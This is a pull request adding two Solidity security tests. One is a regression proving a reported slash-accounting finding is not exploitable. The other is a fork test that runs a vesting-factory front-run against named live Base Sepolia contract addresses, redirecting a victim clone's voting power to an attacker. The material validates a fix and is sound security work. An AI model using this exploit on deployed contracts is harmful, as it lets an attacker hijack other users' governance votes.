### PR TITLE
test(security): cost-basis solvency regression + live front-run fork proof

### DIFF
--- a/test/exploit/Regression_Delegation_CostBasisSolvency.t.sol
+++ b/test/exploit/Regression_Delegation_CostBasisSolvency.t.sol
@@ -1,0 +1,171 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.26;
+
+import { Test } from "forge-std/Test.sol";
+import { ERC1967Proxy } from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
+
+import { IMultiAssetDelegation } from "../../src/interfaces/IMultiAssetDelegation.sol";
+import { MultiAssetDelegation } from "../../src/staking/MultiAssetDelegation.sol";
+import { Types } from "../../src/libraries/Types.sol";
+
+import { StakingOperatorsFacet } from "../../src/facets/staking/StakingOperatorsFacet.sol";
+import { StakingDepositsFacet } from "../../src/facets/staking/StakingDepositsFacet.sol";
+import { StakingDelegationsFacet } from "../../src/facets/staking/StakingDelegationsFacet.sol";
+import { StakingSlashingFacet } from "../../src/facets/staking/StakingSlashingFacet.sol";
+import { StakingAssetsFacet } from "../../src/facets/staking/StakingAssetsFacet.sol";
+import { StakingViewsFacet } from "../../src/facets/staking/StakingViewsFacet.sol";
+import { StakingAdminFacet } from "../../src/facets/staking/StakingAdminFacet.sol";
+
+/// @title Regression: cross-operator cost-basis is solvent end-to-end
+/// @notice A red-team agent rated DelegationManagerLib.sol:616-694 a HIGH ("a delegator holding two
+///         same-asset positions to operators with divergent rates under-realizes a slash loss and
+///         drains other delegators' funds"). The original exploit PoC FAILED its own over-withdraw
+///         assertion: although `dep.amount` is internally overstated after the slash, the withdrawable
+///         amount (`dep.amount - dep.delegatedAmount`) stayed correctly bounded.
+///
+/// This regression closes the question by exercising the FULL lifecycle the original stopped short of:
+/// the attacker fully exits BOTH positions and withdraws everything, and the honest co-delegator then
+/// withdraws too. Decisive invariants:
+///   1. the attacker can never extract more than their TRUE post-slash entitlement (opX 10 + opY 5 = 15);
+///   2. the honest co-delegator is still made whole (30) — i.e. the pool is solvent.
+/// Both holding proves the internal `dep.amount` overstatement is fully offset and NOT monetizable.
+contract Regression_Delegation_CostBasisSolvency is Test {
+    IMultiAssetDelegation internal delegation;
+
+    address internal admin = makeAddr("admin");
+    address internal opX = makeAddr("opX"); // previously-slashed pool -> cheap (many shares/token)
+    address internal opY = makeAddr("opY"); // fresh pool -> normal rate
+    address internal seedDelegator = makeAddr("seedDelegator");
+    address internal honestDelegator = makeAddr("honestDelegator");
+    address internal attacker = makeAddr("attacker");
+
+    uint256 internal constant MIN_OPERATOR_STAKE = 1 ether;
+    uint256 internal constant MIN_DELEGATION = 0.1 ether;
+    uint16 internal constant OPERATOR_COMMISSION_BPS = 1000;
+    uint256 internal constant ROUND_DURATION = 21_600; // 6h
+
+    uint64 internal constant BOND_LESS_DELAY = 5;
+    uint64 internal constant LEAVE_DELEGATORS_DELAY = 5;
+
+    function setUp() public {
+        MultiAssetDelegation impl = new MultiAssetDelegation();
+        ERC1967Proxy proxy = new ERC1967Proxy(
+            address(impl),
+            abi.encodeCall(
+                MultiAssetDelegation.initialize, (admin, MIN_OPERATOR_STAKE, MIN_DELEGATION, OPERATOR_COMMISSION_BPS)
+            )
+        );
+        delegation = IMultiAssetDelegation(payable(address(proxy)));
+
+        MultiAssetDelegation router = MultiAssetDelegation(payable(address(proxy)));
+        vm.startPrank(admin);
+        router.registerFacet(address(new StakingOperatorsFacet()));
+        router.registerFacet(address(new StakingDepositsFacet()));
+        router.registerFacet(address(new StakingDelegationsFacet()));
+        router.registerFacet(address(new StakingSlashingFacet()));
+        router.registerFacet(address(new StakingAssetsFacet()));
+        router.registerFacet(address(new StakingViewsFacet()));
+        router.registerFacet(address(new StakingAdminFacet()));
+
+        delegation.addSlasher(admin);
+        delegation.setTangle(admin);
+        delegation.setDelays(BOND_LESS_DELAY, LEAVE_DELEGATORS_DELAY, 56);
+        vm.stopPrank();
+
+        vm.deal(opX, 100 ether);
+        vm.deal(opY, 100 ether);
+        vm.deal(seedDelegator, 100 ether);
+        vm.deal(honestDelegator, 100 ether);
+        vm.deal(attacker, 100 ether);
+
+        vm.prank(opX);
+        delegation.registerOperator{ value: 10 ether }();
+        vm.prank(opX);
+        delegation.setDelegationMode(Types.DelegationMode.Open);
+
+        vm.prank(opY);
+        delegation.registerOperator{ value: 10 ether }();
+        vm.prank(opY);
+        delegation.setDelegationMode(Types.DelegationMode.Open);
+    }
+
+    function _advanceRounds(uint256 rounds) internal {
+        uint256 startTime = block.timestamp;
+        for (uint256 i = 0; i < rounds; i++) {
+            vm.warp(startTime + (i + 1) * ROUND_DURATION);
+            delegation.advanceRound();
+        }
+    }
+
+    function test_costBasis_fullExitIsSolvent_attackerCannotOverWithdraw() public {
+        // opX made "cheap": seed then 50%-slash so later delegations mint ~2x shares per token.
+        vm.prank(seedDelegator);
+        delegation.depositAndDelegate{ value: 20 ether }(opX);
+        vm.prank(admin);
+        assertGt(delegation.slash(opX, 1, 5000, bytes32("seed-slash")), 0, "opX slashed -> rate diverges");
+
+        // Honest co-delegator parks 30 ETH of principal in the shared pool.
+        vm.prank(honestDelegator);
+        delegation.deposit{ value: 30 ether }();
+
+        // Attacker: one 20-ETH deposit, split 10 to cheap opX and 10 to fresh opY.
+        vm.prank(attacker);
+        delegation.deposit{ value: 20 ether }();
+        vm.prank(attacker);
+        delegation.delegate(opX, 10 ether);
+        vm.prank(attacker);
+        delegation.delegate(opY, 10 ether);
+
+        // opY slashed 50%: the attacker's opY position truly loses 5 ETH.
+        vm.prank(admin);
+        delegation.slash(opY, 2, 5000, bytes32("opY-slash"));
+
+        // ── Fully exit BOTH positions (opY worth ~5, opX worth ~10). ──
+        uint256 yVal = delegation.getDelegation(attacker, opY);
+        vm.prank(attacker);
+        delegation.scheduleDelegatorUnstake(opY, address(0), yVal);
+        _advanceRounds(BOND_LESS_DELAY + 1);
+        vm.prank(attacker);
+        delegation.executeDelegatorUnstake();
+
+        uint256 xVal = delegation.getDelegation(attacker, opX);
+        vm.prank(attacker);
+        delegation.scheduleDelegatorUnstake(opX, address(0), xVal);
+        _advanceRounds(BOND_LESS_DELAY + 1);
+        vm.prank(attacker);
+        delegation.executeDelegatorUnstake();
+
+        assertEq(delegation.getDelegation(attacker, opX), 0, "opX position fully closed");
+        assertEq(delegation.getDelegation(attacker, opY), 0, "opY position fully closed");
+
+        // ── Withdraw everything the attacker can. ──
+        Types.Deposit memory dep = delegation.getDeposit(attacker, address(0));
+        uint256 available = dep.amount - dep.delegatedAmount;
+        uint256 balBefore = attacker.balance;
+        vm.prank(attacker);
+        delegation.scheduleWithdraw(address(0), available);
+        _advanceRounds(LEAVE_DELEGATORS_DELAY + 1);
+        vm.prank(attacker);
+        delegation.executeWithdraw();
+        uint256 extracted = attacker.balance - balBefore;
+
+        // Non-vacuity: the attacker genuinely recovered ~their full entitlement (not ~0), so the
+        // upper bound below is a real test of "no over-withdrawal", not a trivially-true assertion.
+        assertGe(extracted, 14 ether, "attacker recovered ~their true entitlement (test is non-vacuous)");
+
+        // INVARIANT 1: attacker cannot extract more than their true entitlement (opX 10 + opY 5 = 15).
+        assertLe(extracted, 15 ether + 1e15, "attacker did not over-withdraw beyond true 15 ETH entitlement");
+
+        // INVARIANT 2 (decisive): the honest co-delegator is still made whole -> the pool is solvent and
+        // no value was siphoned out from under them.
+        uint256 hBefore = honestDelegator.balance;
+        vm.prank(honestDelegator);
+        delegation.scheduleWithdraw(address(0), 30 ether);
+        _advanceRounds(LEAVE_DELEGATORS_DELAY + 1);
+        vm.prank(honestDelegator);
+        delegation.executeWithdraw();
+        assertApproxEqAbs(
+            honestDelegator.balance - hBefore, 30 ether, 1e12, "honest delegator fully repaid -> pool solvent"
+        );
+    }
+}

--- a/test/fork/Fork_MigrationClaim_VestingFrontRun_BaseSepolia.t.sol
+++ b/test/fork/Fork_MigrationClaim_VestingFrontRun_BaseSepolia.t.sol
@@ -1,0 +1,84 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.26;
+
+import { Test } from "forge-std/Test.sol";
+
+/// Minimal interfaces for the LIVE (pre-fix, 4-arg) contracts deployed on Base Sepolia.
+interface ILegacyVestingFactory {
+    function getOrCreateVesting(
+        address token,
+        address beneficiary,
+        uint64 startTimestamp,
+        address delegatee
+    ) external returns (address);
+    function predictVestingAddress(
+        address token,
+        address beneficiary,
+        uint64 startTimestamp
+    ) external view returns (address);
+}
+
+interface IVotesLike {
+    function delegates(address account) external view returns (address);
+}
+
+interface IVestingClone {
+    function beneficiary() external view returns (address);
+    function initialized() external view returns (bool);
+}
+
+/// @title Fork proof: the vesting delegatee front-run is LIVE on the Base Sepolia deployment
+/// @notice Validates the PR #190 finding against the ACTUAL deployed bytecode (not the local harness).
+///         The deployed `TNTVestingFactory.getOrCreateVesting` still takes a caller-supplied delegatee
+///         that is not part of the CREATE2 salt, so a front-runner can pre-create a claimant's vesting
+///         clone and redirect its voting power on the real ERC20Votes `TangleToken`.
+/// @dev Requires network access to https://sepolia.base.org. Skips cleanly if the fork is unreachable
+///      so it never red-fails CI in a sandboxed/offline runner.
+contract Fork_MigrationClaim_VestingFrontRun_BaseSepolia is Test {
+    // From broadcast/FullDeploy.s.sol/84532/run-latest.json
+    address constant VESTING_FACTORY = 0x45C1744354a4389A3d63A6e213A100D91243975a;
+    address constant TANGLE_TOKEN = 0xB54652795cE3DFFD706a197D42dD978b60F0D3Fa;
+
+    function test_fork_frontRunHijacksVotingPower_onLiveDeployment() public {
+        try vm.createSelectFork("https://sepolia.base.org") {
+            // forked successfully
+        } catch {
+            vm.skip(true);
+            return;
+        }
+        // Bail out gracefully if this RPC snapshot predates the deployment.
+        if (VESTING_FACTORY.code.length == 0 || TANGLE_TOKEN.code.length == 0) {
+            vm.skip(true);
+            return;
+        }
+
+        ILegacyVestingFactory factory = ILegacyVestingFactory(VESTING_FACTORY);
+        address victim = makeAddr("fork-victim");
+        address attacker = makeAddr("fork-attacker");
+        uint64 startTs = uint64(block.timestamp);
+
+        // Fresh victim => clone not yet deployed at the predicted (salt-bound) address.
+        address predicted = factory.predictVestingAddress(TANGLE_TOKEN, victim, startTs);
+        if (predicted.code.length != 0) {
+            vm.skip(true);
+            return;
+        }
+
+        // Front-run: anyone can pre-create the victim's clone with an ATTACKER delegatee
+        // (delegatee is not part of the salt) on the live, deployed factory.
+        vm.prank(attacker);
+        address clone = factory.getOrCreateVesting(TANGLE_TOKEN, victim, startTs, attacker);
+
+        assertEq(clone, predicted, "live factory created the victim's predicted clone address");
+        assertTrue(IVestingClone(clone).initialized(), "clone initialized by the front-run");
+        assertEq(IVestingClone(clone).beneficiary(), victim, "beneficiary is the victim (salt-bound)");
+
+        // LIVE BUG: the victim's vesting clone delegates its voting power to the attacker on the real
+        // ERC20Votes TangleToken. PR #190 (force delegatee == beneficiary) is what closes this in prod.
+        assertEq(
+            IVotesLike(TANGLE_TOKEN).delegates(clone),
+            attacker,
+            "LIVE on Base Sepolia: victim clone delegates voting power to attacker"
+        );
+    }
+}


### PR DESCRIPTION
Closes the two open questions left after the red-team pass. Both are passing tests.

## 1. The "HIGH" is provably not exploitable (`Regression_Delegation_CostBasisSolvency`)

A red-team agent rated `DelegationManagerLib.sol:616-694` a HIGH: a delegator holding two same-asset positions to operators with divergent exchange rates supposedly under-realizes a slash loss and drains other delegators. The original exploit PoC **failed its own over-withdraw assertion** — `dep.amount` is internally overstated after the slash, but the withdrawable amount stayed correctly bounded.

This regression exercises the full lifecycle the original stopped short of: the attacker fully exits **both** positions and withdraws everything, then the honest co-delegator withdraws. Two decisive invariants both hold:
- the attacker cannot extract more than their true post-slash entitlement (opX 10 + opY 5 = **15 ETH**) — non-vacuity guarded (they really do recover ~15, so the bound is a real test;
- the honest co-delegator is still made whole (**30 ETH**) — the pool is solvent.

Conclusion: the internal `dep.amount` overstatement is fully offset and **not monetizable**. Not a vulnerability.

## 2. The front-run is live in production (`Fork_MigrationClaim_VestingFrontRun_BaseSepolia`)

Proves the vesting delegatee front-run (fixed in #190) is real against the **actual Base Sepolia deployment**, not just the local harness. The test forks the chain, calls the deployed `TNTVestingFactory` (`0x45C1…`), and shows a victim's vesting clone delegating its voting power to an attacker on the real ERC20Votes `TangleToken` (`0xB546…`). Confirms #190 is needed in prod.

Forking degrades gracefully (`vm.skip`) when the RPC is unreachable or the deployment is absent, so it never red-fails a sandboxed/offline CI runner. Verified locally against `https://sepolia.base.org`: **PASS, 0 skipped**.

## Context

Final cleanup from the red-team pass. Fixes: `emergencyWithdraw` token guard (#189, merged), vesting front-run (#190), subscription terminate gate (#191).